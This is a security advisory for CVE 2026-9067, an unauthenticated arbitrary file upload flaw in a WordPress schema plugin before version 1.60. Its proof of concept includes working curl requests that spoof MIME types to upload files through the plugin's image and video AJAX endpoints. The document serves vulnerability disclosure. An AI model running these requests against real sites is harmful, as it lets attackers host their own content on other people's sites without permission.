Schema & Structured Data for WP & AMP < 1.60 – Unauthenticated Arbitrary Media Upload | CVE 2026-9067

Description

The plugin does not check user capabilities on its frontend AJAX file-upload handlers and does not validate the actual content of uploaded files against the endpoint's intended media type, allowing unauthenticated users to upload any file type accepted by WordPress's media library through endpoints that should only accept images or videos.

Proof of Concept

## Prerequisites

1. Install and activate Schema & Structured Data for WP & AMP (slug: `schema-and-structured-data-for-wp`) at v1.59 or earlier.
2. The plugin emits the `saswp_rf_form_action_nonce` nonce on any page that renders the review form (`saswp_rf_localize_data.saswp_rf_page_security_nonce`). The same nonce can also be minted by anyone who can reach a page where the script is enqueued, so it is not an authorization boundary.

## Steps

1. Obtain the nonce. Either grab it from a rendered review page, or — equivalent for testing — generate it via WP-CLI:

   ```bash
   ddev wp eval 'echo wp_create_nonce("saswp_rf_form_action_nonce");'
   ```

2. As an unauthenticated visitor, upload a non-image file via the image endpoint. The plugin checks only the client-supplied Content-Type against an image MIME allowlist, so spoofing it to `image/png` is enough to pass the plugin's check; WordPress core then stores the file based on its real type (so the saved file keeps its true extension):

   ```bash
   # CSV uploaded through the IMAGE endpoint
   curl -X POST 'https://target/wp-admin/admin-ajax.php' \
     -F 'action=saswp_rf_form_image_upload' \
     -F 'saswp_rf_form_nonce=<NONCE>' \
     -F 'saswp-rf-form-image=@evil.csv;type=image/png;filename=evil.csv'
   ```

   Response on 1.59:

   ```
   {"success":true,"data":{"file_info":{"id":<n>,"url":false}}}
   ```

   `url` is `false` because WP cannot generate a thumbnail for a non-image, but the file is saved on disk at `/wp-content/uploads/YYYY/MM/evil.csv` and is publicly retrievable.

3. The same primitive works against the video endpoint:

   ```bash
   curl -X POST 'https://target/wp-admin/admin-ajax.php' \
     -F 'action=saswp_rf_form_video_upload' \
     -F 'saswp_rf_form_nonce=<NONCE>' \
     -F 'saswp-rf-form-video=@evil.csv;type=video/mp4;filename=evil.csv'
   ```

The set of file types reachable through this primitive is bounded by `get_allowed_mime_types()` for the current (unauthenticated) user, which on a default single-site install covers all standard media-library types (images, audio, video, PDF, common Office formats, ZIP, CSV, JSON, TXT). Executable types (`.php`, `.phtml`, `.html`, `.svg`) remain blocked by WordPress core, so there is no RCE or stored-XSS path — the practical impact is hosting attacker-controlled content under the target site's URL, plus disk consumption.